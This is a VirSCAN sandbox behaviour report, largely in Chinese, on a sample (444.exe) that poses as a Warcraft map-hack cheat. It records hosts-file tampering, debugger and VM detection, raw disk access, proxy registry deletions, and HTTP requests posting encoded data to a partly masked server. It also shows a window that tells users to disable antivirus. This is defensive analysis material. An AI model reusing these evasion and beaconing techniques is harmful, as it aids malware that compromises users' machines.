VirSCAN VirSCAN

1, You can UPLOAD any files, but there is 20Mb limit per file.
2, VirSCAN supports Rar/Zip decompression, but it must be less than 20 files.
3, VirSCAN can scan compressed files with password 'infected' or 'virus'.

Language
Server load
Server Load
文件信息
安全评分 :55
基本信息
MD5:ae921fef07e12c2dad2ce2709c0a13d1
文件类型:zip
出品公司:
版本:
壳或编译器信息:
子文件信息:444.exe / 0a7093e4b55c6b9db19699fe18f03656 / EXE
关键行为
行为描述:设置特殊文件夹属性
详情信息:C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5
C:\Documents and Settings\Administrator\Local Settings\History
C:\Documents and Settings\Administrator\Local Settings\History\History.IE5
C:\Documents and Settings\Administrator\Cookies
行为描述:直接获取CPU时钟
详情信息:EAX = 0x4ebb2c5b, EDX = 0x000000ba
EAX = 0x4ebb2ca7, EDX = 0x000000ba
EAX = 0x5142fc30, EDX = 0x000000ba
EAX = 0x5142fc7c, EDX = 0x000000ba
EAX = 0x5142fcc8, EDX = 0x000000ba
EAX = 0x5142fd14, EDX = 0x000000ba
EAX = 0x5142fd60, EDX = 0x000000ba
EAX = 0x5142fdac, EDX = 0x000000ba
EAX = 0x5142fdf8, EDX = 0x000000ba
EAX = 0x5142fe44, EDX = 0x000000ba
行为描述:获取TickCount值
详情信息:TickCount = 231556, SleepMilliseconds = 5041.
TickCount = 231603, SleepMilliseconds = 5041.
TickCount = 231619, SleepMilliseconds = 5041.
TickCount = 231650, SleepMilliseconds = 5041.
TickCount = 231666, SleepMilliseconds = 5041.
TickCount = 231697, SleepMilliseconds = 5041.
TickCount = 231744, SleepMilliseconds = 5041.
TickCount = 231806, SleepMilliseconds = 5041.
TickCount = 231900, SleepMilliseconds = 5041.
TickCount = 232041, SleepMilliseconds = 5041.
TickCount = 232056, SleepMilliseconds = 5041.
TickCount = 232072, SleepMilliseconds = 5041.
TickCount = 232087, SleepMilliseconds = 5041.
TickCount = 232103, SleepMilliseconds = 5041.
TickCount = 232134, SleepMilliseconds = 5041.
行为描述:修改HOST文件
详情信息:C:\WINDOWS\system32\drivers\etc\hosts ---> Offset = 0
行为描述:更名后删除HOST文件
详情信息:C:\WINDOWS\system32\drivers\etc\hosts
行为描述:修改敏感的系统文件
详情信息:C:\WINDOWS\system32\drivers\etc\lmhosts.sam ---> Offset = 0
行为描述:直接调用系统关键API
详情信息:Index = 0x0000009A, Name: NtQueryInformationProcess, Instruction Address = 0x0184F3E6
Index = 0x000000E5, Name: NtSetInformationThread, Instruction Address = 0x0184F3E6
Index = 0x00000011, Name: NtAllocateVirtualMemory, Instruction Address = 0x0046C3D6
Index = 0x00000011, Name: NtAllocateVirtualMemory, Instruction Address = 0x0046CE33
Index = 0x00000011, Name: NtAllocateVirtualMemory, Instruction Address = 0x0046CFF6
行为描述:VMWare特殊指令检测虚拟机
详情信息:N/A
进程行为
行为描述:创建本地线程
详情信息:TargetProcess: 444.exe, InheritedFromPID = 2000, ProcessID = 2916, ThreadID = 2976, StartAddress = 77DC845A, Parameter = 00000000
TargetProcess: 444.exe, InheritedFromPID = 2000, ProcessID = 2916, ThreadID = 3020, StartAddress = 0040A997, Parameter = 00359D9D
TargetProcess: 444.exe, InheritedFromPID = 2000, ProcessID = 2916, ThreadID = 3024, StartAddress = 0040A997, Parameter = 00359D9D
TargetProcess: 444.exe, InheritedFromPID = 2000, ProcessID = 2916, ThreadID = 3028, StartAddress = 0040A997, Parameter = 00359D9D
TargetProcess: 444.exe, InheritedFromPID = 2000, ProcessID = 2916, ThreadID = 3032, StartAddress = 0040A997, Parameter = 00359D9D
TargetProcess: 444.exe, InheritedFromPID = 2000, ProcessID = 2916, ThreadID = 3036, StartAddress = 0040A997, Parameter = 00359D9D
TargetProcess: 444.exe, InheritedFromPID = 2000, ProcessID = 2916, ThreadID = 3056, StartAddress = 0042DF7B, Parameter = 00000000
TargetProcess: 444.exe, InheritedFromPID = 2000, ProcessID = 2916, ThreadID = 3060, StartAddress = 0040A997, Parameter = 00359D9D
TargetProcess: 444.exe, InheritedFromPID = 2000, ProcessID = 2916, ThreadID = 3064, StartAddress = 4AEA7456, Parameter = 00000000
TargetProcess: 444.exe, InheritedFromPID = 2000, ProcessID = 2916, ThreadID = 3068, StartAddress = 7C947EBB, Parameter = 00000000
TargetProcess: 444.exe, InheritedFromPID = 2000, ProcessID = 2916, ThreadID = 3072, StartAddress = 7C930230, Parameter = 00000000
TargetProcess: 444.exe, InheritedFromPID = 2000, ProcessID = 2916, ThreadID = 3524, StartAddress = 0042DF6F, Parameter = 00000000
TargetProcess: 444.exe, InheritedFromPID = 2000, ProcessID = 2916, ThreadID = 3536, StartAddress = 0044C972, Parameter = 00000000
TargetProcess: 444.exe, InheritedFromPID = 2000, ProcessID = 2916, ThreadID = 3540, StartAddress = 0040A997, Parameter = 00359D9D
TargetProcess: 444.exe, InheritedFromPID = 2000, ProcessID = 2916, ThreadID = 3544, StartAddress = 0040A997, Parameter = 00359D9D
行为描述:枚举进程
详情信息:N/A
文件行为
行为描述:创建文件
详情信息:C:\WINDOWS\system32\drivers\etc\hosts
C:\WINDOWS\system32\drivers\etc\lmhosts.sam
C:\Documents and Settings\Administrator\Local Settings\Temp\okyes.wav
C:\Documents and Settings\Administrator\My Documents\8c6d3e47
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\IUKHR8T2\dzx_test[1].php
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\IUKHR8T2\pojie[1].php
行为描述:设置特殊文件夹属性
详情信息:C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5
C:\Documents and Settings\Administrator\Local Settings\History
C:\Documents and Settings\Administrator\Local Settings\History\History.IE5
C:\Documents and Settings\Administrator\Cookies
行为描述:覆盖已有文件
详情信息:C:\Documents and Settings\Administrator\Local Settings\Application Data\GDIPFONTCACHEV1.DAT
行为描述:查找文件
详情信息:FileName = C:\WINDOWS\system32\\temp\*.*
FileName = C:\Documents and Settings\Administrator\My Documents\8c6d3e47
FileName = C:\Documents and Settings
FileName = C:\Documents and Settings\Administrator
FileName = C:\Documents and Settings\Administrator\Local Settings
FileName = C:\Documents and Settings\All Users\Application Data\Microsoft\Network\Connections\Pbk\*.pbk
FileName = C:\WINDOWS\system32\Ras\*.pbk
FileName = C:\Documents and Settings\Administrator\Application Data\Microsoft\Network\Connections\Pbk\*.pbk
行为描述:修改HOST文件
详情信息:C:\WINDOWS\system32\drivers\etc\hosts ---> Offset = 0
行为描述:删除文件
详情信息:C:\WINDOWS\system32\drivers\etc\lmhosts.sam
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\IUKHR8T2\dzx_test[1].php
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\IUKHR8T2\pojie[1].php
行为描述:更名后删除HOST文件
详情信息:C:\WINDOWS\system32\drivers\etc\hosts
行为描述:重命名文件
详情信息:C:\Documents and Settings\Administrator\Local Settings\%temp%\****.exe_7zdump\444.exe ---> C:\Documents and Settings\Administrator\Local Settings\%temp%\****.exe_7zdump\14IYW5KH.exe
行为描述:修改敏感的系统文件
详情信息:C:\WINDOWS\system32\drivers\etc\lmhosts.sam ---> Offset = 0
行为描述:修改文件内容
详情信息:C:\Documents and Settings\Administrator\Local Settings\Temp\okyes.wav ---> Offset = 0
C:\Documents and Settings\Administrator\My Documents\8c6d3e47 ---> Offset = 0
C:\Documents and Settings\Administrator\My Documents\8c6d3e47 ---> Offset = 598
C:\Documents and Settings\Administrator\My Documents\8c6d3e47 ---> Offset = 617
C:\Documents and Settings\Administrator\My Documents\8c6d3e47 ---> Offset = 655
C:\Documents and Settings\Administrator\My Documents\8c6d3e47 ---> Offset = 662
C:\Documents and Settings\Administrator\My Documents\8c6d3e47 ---> Offset = 669
网络行为
行为描述:连接指定站点
详情信息:InternetConnectA: ServerName = **.209.123.**, PORT = 80, UserName = , Password = , hSession = 0x00cc0004, hConnect = 0x00cc0008, Flags = 0x00000000
InternetConnectA: ServerName = **.209.123.**, PORT = 80, UserName = , Password = , hSession = 0x00cc0008, hConnect = 0x00cc000c, Flags = 0x00000000
行为描述:打开HTTP连接
详情信息:InternetOpenA: UserAgent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0), hSession = 0x00cc0004
InternetOpenA: UserAgent: Agent251850, hSession = 0x00cc0008
InternetOpenA: UserAgent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0), hSession = 0x00cc0008
行为描述:建立到一个指定的套接字连接
详情信息:IP: **.209.123.**:80, SOCKET = 0x00000354
IP: **.209.123.**:80, SOCKET = 0x0000021c
IP: **.209.123.**:80, SOCKET = 0x00000344
IP: **.209.123.**:80, SOCKET = 0x00000360
IP: **.209.123.**:80, SOCKET = 0x00000378
IP: **.209.123.**:80, SOCKET = 0x00000394
行为描述:读取网络文件
详情信息:hFile = 0x00cc000c, BytesToRead =102400, BytesRead = 102400.
hFile = 0x00cc0010, BytesToRead =512, BytesRead = 512.
行为描述:发送HTTP包
详情信息:GET /pojie.txt HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Accept: */* Host: **.209.123.** Cache-Control: no-cache
POST /config/dzx_test.php HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Referer: http://210.209.123.236/config/dzx_test.php Accept-Language: zh-cn Content-Type: application/x-www-form-urlencoded Content-Length: 15 User-Agent: Agent251850 Host: **.209.123.** Cache-Control: no-cache DATA=FCD1576F02
POST /config/pojie.php HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Referer: http://210.209.123.236/config/pojie.php Accept-Language: zh-cn Content-Type: application/x-www-form-urlencoded Content-Length: 75 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Host: **.209.123.** Cache-Control: no-cache DATA=E1C7573918D8E7C899240C99EDCEAC257EBDA3FF84904C142835150859B240A6A7795A
行为描述:打开HTTP请求
详情信息:HttpOpenRequestA: **.209.123.**:80/pojie.txt, hConnect = 0x00cc0008, hRequest = 0x00cc000c, Verb: GET, Referer: , Flags = 0x84000000
HttpOpenRequestA: **.209.123.**:80/config/dzx_test.php, hConnect = 0x00cc000c, hRequest = 0x00cc0010, Verb: POST, Referer: , Flags = 0x80000000
HttpOpenRequestA: **.209.123.**:80/config/pojie.php, hConnect = 0x00cc000c, hRequest = 0x00cc0010, Verb: POST, Referer: , Flags = 0x80000000
注册表行为
行为描述:修改注册表
详情信息:\REGISTRY\MACHINE\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication\Name
\REGISTRY\MACHINE\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication\ID
\REGISTRY\USER\S-*\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
行为描述:删除注册表键值
详情信息:\REGISTRY\USER\S-*\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyServer
\REGISTRY\USER\S-*\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyOverride
\REGISTRY\USER\S-*\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoConfigURL
其他行为
行为描述:直接调用系统关键API
详情信息:Index = 0x0000009A, Name: NtQueryInformationProcess, Instruction Address = 0x0184F3E6
Index = 0x000000E5, Name: NtSetInformationThread, Instruction Address = 0x0184F3E6
Index = 0x00000011, Name: NtAllocateVirtualMemory, Instruction Address = 0x0046C3D6
Index = 0x00000011, Name: NtAllocateVirtualMemory, Instruction Address = 0x0046CE33
Index = 0x00000011, Name: NtAllocateVirtualMemory, Instruction Address = 0x0046CFF6
行为描述:检测自身是否被调试
详情信息:IsDebuggerPresent
行为描述:创建互斥体
详情信息:RasPbFile
CTF.LBES.MutexDefaultS-*
CTF.Compart.MutexDefaultS-*
CTF.Asm.MutexDefaultS-*
CTF.Layouts.MutexDefaultS-*
CTF.TMD.MutexDefaultS-*
CTF.TimListCache.FMPDefaultS-*MUTEX.DefaultS-*
DDrawWindowListMutex
DDrawDriverObjectListMutex
__DDrawExclMode__
__DDrawCheckExclMode__
Local\ZonesCounterMutex
Local\ZoneAttributeCacheCounterMutex
Local\ZonesCacheCounterMutex
Local\ZonesLockedCacheCounterMutex
行为描述:创建事件对象
详情信息:EventName = DINPUTWINMM
EventName = Global\userenv: User Profile setup event
EventName = MSCTF.SendReceive.Event.IGL.IC
EventName = MSCTF.SendReceiveConection.Event.IGL.IC
EventName = 111882112850000456456634
行为描述:打开事件
详情信息:HookSwitchHookEnabledEvent
\SECURITY\LSA_AUTHENTICATION_INITIALIZED
Global\SvcctrlStartEvent_A3752DX
\INSTALLATION_SECURITY_HOLD
CTF.ThreadMIConnectionEvent.000007E8.00000000.00000010
CTF.ThreadMarshalInterfaceEvent.000007E8.00000000.00000010
MSCTF.SendReceiveConection.Event.IOH.IC
MSCTF.SendReceive.Event.IOH.IC
111882112850000456456634
CTF.ThreadMIConnectionEvent.000007E8.00000000.00000011
CTF.ThreadMarshalInterfaceEvent.000007E8.00000000.00000011
行为描述:打开互斥体
详情信息:RasPbFile
ShimCacheMutex
DBWinMutex
Local\_!MSFTHISTORY!_
Local\c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Local\c:!documents and settings!administrator!cookies!
Local\c:!documents and settings!administrator!local settings!history!history.ie5!
Local\WininetStartupMutex
Local\WininetConnectionMutex
Local\WininetProxyRegistryMutex
Local\!IETld!Mutex
行为描述:查找指定窗口
详情信息:NtUserFindWindowEx: [Class,Window] = [Shell_TrayWnd,]
NtUserFindWindowEx: [Class,Window] = [CicLoaderWndClass,]
行为描述:枚举窗口
详情信息:N/A
行为描述:获取TickCount值
详情信息:TickCount = 231556, SleepMilliseconds = 5041.
TickCount = 231603, SleepMilliseconds = 5041.
TickCount = 231619, SleepMilliseconds = 5041.
TickCount = 231650, SleepMilliseconds = 5041.
TickCount = 231666, SleepMilliseconds = 5041.
TickCount = 231697, SleepMilliseconds = 5041.
TickCount = 231744, SleepMilliseconds = 5041.
TickCount = 231806, SleepMilliseconds = 5041.
TickCount = 231900, SleepMilliseconds = 5041.
TickCount = 232041, SleepMilliseconds = 5041.
TickCount = 232056, SleepMilliseconds = 5041.
TickCount = 232072, SleepMilliseconds = 5041.
TickCount = 232087, SleepMilliseconds = 5041.
TickCount = 232103, SleepMilliseconds = 5041.
TickCount = 232134, SleepMilliseconds = 5041.
行为描述:调整进程token权限
详情信息:SE_DEBUG_PRIVILEGE
行为描述:窗口信息
详情信息:Pid = 2916, Hwnd=0x1039a, Text = 请退出所有杀毒软件包括保险箱,否则外挂将无法正常运行。外挂绝不会加入任何木马病毒, ClassName = Syser MsgBox.
Pid = 2916, Hwnd=0x10466, Text = 确定, ClassName = Button.
Pid = 2916, Hwnd=0x10468, Text = 程序无法与服务器建立连接,请与作者联系 QQ 952203029, ClassName = Static.
Pid = 2916, Hwnd=0x70462, Text = 信息:, ClassName = #32770.
Pid = 2916, Hwnd=0x1047c, Text = 点卡窗口标签, ClassName = Afx:400000:b:10011:1900015:0.
Pid = 2916, Hwnd=0x2039a, Text = , ClassName = WTWindow.
行为描述:直接操作物理设备
详情信息:\??\PhysicalDrive0
行为描述:调用Sleep函数
详情信息:[1]: MilliSeconds = 5041.
[2]: MilliSeconds = 5041.
[3]: MilliSeconds = 5041.
[4]: MilliSeconds = 5041.
[5]: MilliSeconds = 5041.
[6]: MilliSeconds = 5041.
[7]: MilliSeconds = 1000.
[8]: MilliSeconds = 100.
[9]: MilliSeconds = 1000.
[10]: MilliSeconds = 100.
行为描述:隐藏指定窗口
详情信息:[Window,Class] = [迷雾移除(小),Button]
[Window,Class] = [迷雾移除(大),Button]
[Window,Class] = [魔兽错误点我imba,Button]
[Window,Class] = [小地图显示單位(AH),Button]
[Window,Class] = [地图防检测/防错误,Button]
[Window,Class] = [读秒取消,Button]
[Window,Class] = [敌军头像,Button]
[Window,Class] = [神符显示,Button]
[Window,Class] = [敌军血条,Button]
[Window,Class] = [秒开游戏,Button]
[Window,Class] = [盟军血条,Button]
[Window,Class] = [技能显示,Button]
[Window,Class] = [显资源条,Button]
[Window,Class] = [资源面板,Button]
[Window,Class] = [交换物品,Button]
行为描述:直接获取CPU时钟
详情信息:EAX = 0x4ebb2c5b, EDX = 0x000000ba
EAX = 0x4ebb2ca7, EDX = 0x000000ba
EAX = 0x5142fc30, EDX = 0x000000ba
EAX = 0x5142fc7c, EDX = 0x000000ba
EAX = 0x5142fcc8, EDX = 0x000000ba
EAX = 0x5142fd14, EDX = 0x000000ba
EAX = 0x5142fd60, EDX = 0x000000ba
EAX = 0x5142fdac, EDX = 0x000000ba
EAX = 0x5142fdf8, EDX = 0x000000ba
EAX = 0x5142fe44, EDX = 0x000000ba
行为描述:VMWare特殊指令检测虚拟机
详情信息:N/A
运行截图
VirSCAN

About VirSCAN | Privacy Policy | Contact us | link | Help VirSCAN
Translated by Keith Miller, United States
Powered By CentOSpol

京ICP备11007605号-12

pol

京公网安备 11010802020746号